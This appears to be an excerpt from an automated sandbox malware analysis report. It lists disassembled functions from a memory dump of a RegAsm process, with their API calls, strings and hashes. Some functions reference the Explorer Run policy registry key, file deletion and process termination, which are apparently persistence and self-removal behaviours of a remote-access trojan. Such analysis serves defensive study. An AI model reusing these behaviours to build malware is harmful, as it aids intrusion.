                    • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                    • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                    • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                    Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteOpenValue
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                    • API String ID: 2654517830-1051519024
                    • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                    • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                    • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                    • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                    Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                    • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteDirectoryFileRemove
                    • String ID: pth_unenc
                    • API String ID: 3325800564-4028850238
                    • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                    • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                    • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                    • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                    Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                    • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ObjectProcessSingleTerminateWait
                    • String ID: pth_unenc
                    • API String ID: 1872346434-4028850238
                    • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                    • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                    • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                    • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                    Function 0044F30A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CommandLine
                    • String ID: 82K
                    • API String ID: 3253501508-3645350227
                    • Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                    • Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
                    • Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                    • Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08
                    Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                    • GetLastError.KERNEL32 ref: 00440D35
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast
                    • String ID:
                    • API String ID: 1717984340-0
                    • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                    • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                    • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                    • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                    Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                    Download Yara Rule
                    APIs
                    • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                    • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                    • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastRead
                    • String ID:
                    • API String ID: 4100373531-0
                    • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                    • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                    • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                    • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99